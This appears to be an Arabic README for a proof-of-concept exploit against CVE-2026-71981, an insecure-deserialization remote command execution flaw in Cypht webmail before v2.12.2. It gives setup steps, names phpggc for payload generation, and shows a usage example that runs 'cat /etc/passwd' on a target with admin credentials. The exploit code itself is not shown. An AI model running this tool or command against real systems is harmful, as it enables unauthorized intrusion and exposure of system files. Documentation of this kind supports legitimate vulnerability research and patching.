
إثبات مفهوم لاستغلال CVE-2026-71981، وهو ثغرة إلغاء تسلسل غير آمنة تؤدي إلى تنفيذ أوامر عن بُعد (RCE) في Cypht. ينفّذ الأوامر ويطبع المخرجات عبر استجابة تسجيل الخروج. يتطلب phpggc لتوليد الحمولة.
هذا هو PoC لثغرة CVE-2026-71981 إلغاء التسلسل غير الآمن (Insecure deserialization) وتنفيذ الأوامر عن بُعد (RCE). تتم طباعة نتيجة الأمر المنفذ في الاستجابة من طلب تسجيل الخروج بعد وسمي </body></html>. استخدم --print-all لطباعة الاستجابة كاملة أيضًا.
الإصدارات المعرضة للثغرة: < v2.12.2
يتطلب هذا السكربت تثبيت https://github.com/ambionics/phpggc من أجل توليد حمولات unserialize().
الإعداد ومثال:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help